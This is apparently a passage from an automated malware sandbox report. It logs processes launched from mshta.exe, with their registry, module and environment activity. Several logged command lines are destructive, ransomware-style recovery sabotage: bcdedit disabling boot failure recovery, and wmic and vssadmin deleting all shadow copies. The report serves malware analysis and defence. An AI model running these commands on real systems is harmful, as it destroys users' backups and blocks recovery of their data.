Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\syswow64\cmd.exe	base_address = 0xc00000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75e90000	2	Fn
Get Filename	-	process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 32743	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x75ea4f70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x75ea4330	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75ea5930	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x74fe09d0	1	Fn

Environment (12)

Operation	Additional Information	Count	Logfile
Get Environment String	-	4	Fn Data
Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps	2	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\FD1HVy\Desktop	1	Fn

Process #20: cmd.exe

Information	Value
ID	#20
File Name	c:\windows\syswow64\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:04:19, Reason: Child Process
Unmonitor	End Time: 00:04:29, Reason: Self Terminated
Monitor Duration	00:00:09

OS Process Information

Information	Value
PID	0x344
Parent PID	0xec8 (c:\windows\syswow64\mshta.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x EE4 0x FF8

Host Behavior

File (17)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\FD1HVy\Desktop	type = file_attributes	2	Fn
Get Info	STD_ERROR_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	6	Fn
Open	STD_INPUT_HANDLE	-	4	Fn
Open	STD_ERROR_HANDLE	-	3	Fn
Write	STD_ERROR_HANDLE	size = 98	1	Fn Data

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 88, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\syswow64\cmd.exe	base_address = 0xc00000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75e90000	2	Fn
Get Filename	-	process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 32743	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x75ea4f70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x75ea4330	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75ea5930	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x74fe09d0	1	Fn

Environment (12)

Operation	Additional Information	Count	Logfile
Get Environment String	-	4	Fn Data
Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps	2	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\FD1HVy\Desktop	1	Fn

Process #22: wmic.exe

157

Information	Value
ID	#22
File Name	c:\windows\syswow64\wbem\wmic.exe
Command Line	wmic SHADOWCOPY DELETE
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:04:25, Reason: Child Process
Unmonitor	End Time: 00:04:47, Reason: Self Terminated
Monitor Duration	00:00:21

OS Process Information

Information	Value
PID	0xdb4
Parent PID	0x868 (c:\windows\syswow64\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x D80 0x CE4 0x D98 0x C48 0x 86C

Host Behavior

COM (6)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	WBEMLocator	IWbemLocator	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	F6D90F12-9C73-11D3-B32E-00C04F990BB4	2933BF95-7B36-11D2-B20E-00C04F983E60	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = root\cli	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = root\cli\ms_409	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = \\NQDPDE\ROOT\CIMV2	1	Fn
Execute	WBEMLocator	IWbemServices	method_name = ExecQuery, query_language = WQL, query = SELECT * FROM Win32_ShadowCopy	1	Fn

Registry (5)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging, data = 48	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging Directory	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging Directory, data = 37	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Log File Max Size, data = 54	1	Fn

Module (1)

Operation	Module	Additional Information	Success	Count	Logfile
Get Handle	c:\windows\syswow64\wbem\wmic.exe	base_address = 0x160000		1	Fn

System (3)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = NQDPDE	1	Fn
Get Time	type = Local Time, time = 2019-04-12 11:18:47 (Local Time)	1	Fn
Get Info	type = System Directory, result_out = C:\WINDOWS\system32	1	Fn

Process #23: vssadmin.exe

Information	Value
ID	#23
File Name	c:\windows\syswow64\vssadmin.exe
Command Line	vssadmin Delete Shadows /All /Quiet
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:04:26, Reason: Child Process
Unmonitor	End Time: 00:04:41, Reason: Self Terminated
Monitor Duration	00:00:15
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x7b4
Parent PID	0xf28 (c:\windows\syswow64\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 9FC 0x 9E4 0x F40 0x E0 0x E20 0x E10

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	AV	YARA	Actions
vssadmin.exe	0x00A30000	0x00A4EFFF	Process Termination	-	32-bit	-			... Region Actions Download Dump

Remarks (1/1)

Monitored Processes

Behavior Information - Grouped by Category

Before

After